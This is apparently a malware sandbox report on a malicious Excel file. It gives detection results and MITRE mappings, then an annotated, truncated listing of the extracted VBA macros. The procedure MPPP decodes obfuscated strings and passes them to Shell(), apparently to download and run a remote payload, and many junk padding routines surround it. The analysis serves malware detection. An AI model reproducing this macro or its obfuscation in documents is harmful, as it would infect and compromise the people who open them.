MALICIOUS
140
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1203 Exploitation for Client Execution
The critical heuristic 'OLE_VBA_SHELL' indicates a Shell() call within the VBA macros. The reconstructed string 'pvkwd#kwws=__m1ps_' is likely part of a command to download and execute a secondary payload. The ClamAV detection further confirms the malicious nature of this Excel file.
Heuristics 3
-
ClamAV: Xls.Malware.Stratos-7506050-0 — critical — CLAMAV_DETECTION: ClamAV detected this file as malware: Xls.Malware.Stratos-7506050-0
-
VBA macros detected — medium — 1 related finding — OLE_VBA_MACROS: Document contains VBA macro code
-
Shell() call in VBA — critical — OLE_VBA_SHELL: Shell() call in VBA
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 62874 bytes |

SHA-256: ad0f6aaded75ff4506b3fd965efbfdb69da4a7e87b9422ef7d1760d4b6f9846f
Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "Module1"
' Module name as recorded in the exported VBA project; the procedures
' below are everything the decoded macros.bas shows before truncation.
' Procedure that triggers the OLE_VBA_SHELL heuristic: of all the
' procedures in the visible listing it is the only one with an
' observable effect. Both Shell arguments are produced by
' yM2OukrFZ(<string>, "3"); that decoder is not in the visible listing
' (the preview is truncated), so the exact command line is not shown
' here, and the analysis above treats it as a download-and-execute
' command. f6 is never declared (no Option Explicit is visible), so it
' is an implicit Variant. Defensive angle: child processes spawned by
' the Excel process are the detection point for this sample.
Sub MPPP()
' First fragment of the command, decoded by the out-of-view helper.
f6 = yM2OukrFZ("pvkwd#kwws=__m1ps_", "3")
' Second fragment is decoded inline and appended; Shell() then runs
' the concatenated string as a command line.
Shell (f6 + yM2OukrFZ("pi9qgmmu", "3"))
End Sub
' Not referenced by MPPP in the visible listing. Its only statement is
' a For loop that calls DoEvents seven times (2 To 8); nothing else is
' read or written, so it has no observable effect. Presumably filler
' inserted to pad the module - confirm against the full source.
Private Sub RSQVGNUlLLcRTLlNsqYM()
Dim nVUIIksEhA As Integer
For nVUIIksEhA = 2 To 8
DoEvents ' yields to pending events; no other work per iteration
Next nVUIIksEhA
End Sub
' Not referenced by MPPP in the visible listing. Calls DoEvents seven
' times (2 To 8) and assigns a local string that is never read. No
' observable effect; presumably padding - confirm against the full
' source.
Private Sub VTNgdzjuzwH()
Dim nVUIIksEhA As Integer
For nVUIIksEhA = 2 To 8
DoEvents ' yields to pending events; no other work per iteration
Next nVUIIksEhA
Dim FeKoDkqJRHnijh As String
FeKoDkqJRHnijh = "1825" ' assigned and never used within this procedure
End Sub
' Not referenced by MPPP in the visible listing. Runs two DoEvents
' loops (seven iterations, then 27 iterations from 11 up to 37) and
' assigns a local string that is never read. No observable effect;
' presumably padding - confirm against the full source.
Private Sub YBdNeikcBeItpdyoftD()
Dim nVUIIksEhA As Integer
For nVUIIksEhA = 2 To 8
DoEvents ' yields to pending events; no other work per iteration
Next nVUIIksEhA
Dim FeKoDkqJRHnijh As String
FeKoDkqJRHnijh = "1825" ' assigned and never used within this procedure
Dim mIVkQiUZymkewtPmK As Integer
mIVkQiUZymkewtPmK = 11
' Counts 11..37, calling DoEvents on each pass (27 iterations).
Do While mIVkQiUZymkewtPmK < 38
DoEvents: mIVkQiUZymkewtPmK = mIVkQiUZymkewtPmK + 1
Loop
End Sub
' Public but not referenced by MPPP in the visible listing. Runs two
' DoEvents loops, assigns a local string that is never read, and ends
' with an If that compares two different string literals, so its End
' statement can never execute. No observable effect; presumably
' padding - confirm against the full source.
Public Sub qLMQgbETnH()
Dim nVUIIksEhA As Integer
For nVUIIksEhA = 2 To 8
DoEvents ' yields to pending events; no other work per iteration
Next nVUIIksEhA
Dim FeKoDkqJRHnijh As String
FeKoDkqJRHnijh = "1825" ' assigned and never used within this procedure
Dim mIVkQiUZymkewtPmK As Integer
mIVkQiUZymkewtPmK = 11
' Counts 11..37, calling DoEvents on each pass (27 iterations).
Do While mIVkQiUZymkewtPmK < 38
DoEvents: mIVkQiUZymkewtPmK = mIVkQiUZymkewtPmK + 1
Loop
' The two literals differ, so this condition is always False and the
' program-terminating End is dead code.
If "yzxCnhoRfeuyB" = "RhaJrtOrvJToCp" Then End
End Sub
' Not referenced by MPPP in the visible listing. Declared as a Function
' but never assigns a return value (implicit Variant, Empty). Runs three
' DoEvents loops, assigns a local string that is never read, and has an
' always-False If. No observable effect; presumably padding - confirm
' against the full source.
Private Function CZYAizlpOp()
Dim nVUIIksEhA As Integer
For nVUIIksEhA = 2 To 8
DoEvents ' yields to pending events; no other work per iteration
Next nVUIIksEhA
Dim FeKoDkqJRHnijh As String
FeKoDkqJRHnijh = "1825" ' assigned and never used within this procedure
Dim mIVkQiUZymkewtPmK As Integer
mIVkQiUZymkewtPmK = 11
' Counts 11..37, calling DoEvents on each pass (27 iterations).
Do While mIVkQiUZymkewtPmK < 38
DoEvents: mIVkQiUZymkewtPmK = mIVkQiUZymkewtPmK + 1
Loop
' The two literals differ, so this condition is always False and the
' program-terminating End is dead code.
If "yzxCnhoRfeuyB" = "RhaJrtOrvJToCp" Then End
Dim gCbSObsGcPZwrUQDY As Integer
For gCbSObsGcPZwrUQDY = 2 To 7
DoEvents ' six more yields (2 To 7)
Next gCbSObsGcPZwrUQDY
End Function
' Not referenced by MPPP in the visible listing. Declared as a Function
' but never assigns a return value (implicit Variant, Empty). Runs three
' DoEvents loops, assigns a local string that is never read, and has two
' always-False Ifs. No observable effect; presumably padding - confirm
' against the full source.
Private Function PPNSqxEjvvKORJix()
Dim nVUIIksEhA As Integer
For nVUIIksEhA = 2 To 8
DoEvents ' yields to pending events; no other work per iteration
Next nVUIIksEhA
Dim FeKoDkqJRHnijh As String
FeKoDkqJRHnijh = "1825" ' assigned and never used within this procedure
Dim mIVkQiUZymkewtPmK As Integer
mIVkQiUZymkewtPmK = 11
' Counts 11..37, calling DoEvents on each pass (27 iterations).
Do While mIVkQiUZymkewtPmK < 38
DoEvents: mIVkQiUZymkewtPmK = mIVkQiUZymkewtPmK + 1
Loop
' The two literals differ, so this condition is always False and the
' program-terminating End is dead code.
If "yzxCnhoRfeuyB" = "RhaJrtOrvJToCp" Then End
Dim gCbSObsGcPZwrUQDY As Integer
For gCbSObsGcPZwrUQDY = 2 To 7
DoEvents ' six more yields (2 To 7)
Next gCbSObsGcPZwrUQDY
' Again two different literals: always False, End never runs.
If "fHLaVFSssTcoQkPnF" = "FQKdMjSejgr" Then End
End Function
' Not referenced by MPPP in the visible listing. Runs four DoEvents
' loops, assigns a local string that is never read, and has two
' always-False Ifs. No observable effect; presumably padding - confirm
' against the full source.
Private Sub QfgpNHlnTatBrQRSQ()
Dim nVUIIksEhA As Integer
For nVUIIksEhA = 2 To 8
DoEvents ' yields to pending events; no other work per iteration
Next nVUIIksEhA
Dim FeKoDkqJRHnijh As String
FeKoDkqJRHnijh = "1825" ' assigned and never used within this procedure
Dim mIVkQiUZymkewtPmK As Integer
mIVkQiUZymkewtPmK = 11
' Counts 11..37, calling DoEvents on each pass (27 iterations).
Do While mIVkQiUZymkewtPmK < 38
DoEvents: mIVkQiUZymkewtPmK = mIVkQiUZymkewtPmK + 1
Loop
' The two literals differ, so this condition is always False and the
' program-terminating End is dead code.
If "yzxCnhoRfeuyB" = "RhaJrtOrvJToCp" Then End
Dim gCbSObsGcPZwrUQDY As Integer
For gCbSObsGcPZwrUQDY = 2 To 7
DoEvents ' six more yields (2 To 7)
Next gCbSObsGcPZwrUQDY
' Again two different literals: always False, End never runs.
If "fHLaVFSssTcoQkPnF" = "FQKdMjSejgr" Then End
Dim lLLcRTLlNsqYMhYOcnVU As Integer
lLLcRTLlNsqYMhYOcnVU = 10
' Counts 10..34, calling DoEvents on each pass (25 iterations).
Do While lLLcRTLlNsqYMhYOcnVU < 35
DoEvents: lLLcRTLlNsqYMhYOcnVU = lLLcRTLlNsqYMhYOcnVU + 1
Loop
End Sub
' Not referenced by MPPP in the visible listing. Declared as a Function
' but never assigns a return value (implicit Variant, Empty). Runs four
' DoEvents loops, assigns two local strings that are never read, and
' has two always-False Ifs. No observable effect; presumably padding -
' confirm against the full source.
Private Function EhAgDViVTNgdzj()
Dim nVUIIksEhA As Integer
For nVUIIksEhA = 2 To 8
DoEvents ' yields to pending events; no other work per iteration
Next nVUIIksEhA
Dim FeKoDkqJRHnijh As String
FeKoDkqJRHnijh = "1825" ' assigned and never used within this procedure
Dim mIVkQiUZymkewtPmK As Integer
mIVkQiUZymkewtPmK = 11
' Counts 11..37, calling DoEvents on each pass (27 iterations).
Do While mIVkQiUZymkewtPmK < 38
DoEvents: mIVkQiUZymkewtPmK = mIVkQiUZymkewtPmK + 1
Loop
' The two literals differ, so this condition is always False and the
' program-terminating End is dead code.
If "yzxCnhoRfeuyB" = "RhaJrtOrvJToCp" Then End
Dim gCbSObsGcPZwrUQDY As Integer
For gCbSObsGcPZwrUQDY = 2 To 7
DoEvents ' six more yields (2 To 7)
Next gCbSObsGcPZwrUQDY
' Again two different literals: always False, End never runs.
If "fHLaVFSssTcoQkPnF" = "FQKdMjSejgr" Then End
Dim lLLcRTLlNsqYMhYOcnVU As Integer
lLLcRTLlNsqYMhYOcnVU = 10
' Counts 10..34, calling DoEvents on each pass (25 iterations).
Do While lLLcRTLlNsqYMhYOcnVU < 35
DoEvents: lLLcRTLlNsqYMhYOcnVU = lLLcRTLlNsqYMhYOcnVU + 1
Loop
Dim ZavwFeKoDkqJRHnij As String
ZavwFeKoDkqJRHnij = "3217" ' assigned and never used within this procedure
End Function
Private Sub PYBdNeikcBeItpdyoftD()
Dim nVUIIksEhA As Integer
For nVUIIksEhA = 2 To 8
DoEvents
Next nVUIIksEhA
Dim FeKoDkqJRHnijh As String
FeKoDkqJRHnijh = "1825"
Dim mIVkQiUZymkewtPmK As Integer
mIVkQiUZymkewtPmK = 11
Do While mIVkQiUZymkewtPmK < 38
DoEvents: mIVkQiUZymkewtPmK = mIVkQiUZymkewtPmK + 1
Loop
If "yzxCnhoRfeuyB" = "RhaJrtOrvJToCp" Then End
Dim gCbSObsGcPZwrUQDY As Integer
For gCbSObsGcPZwrUQDY = 2 To
... (truncated)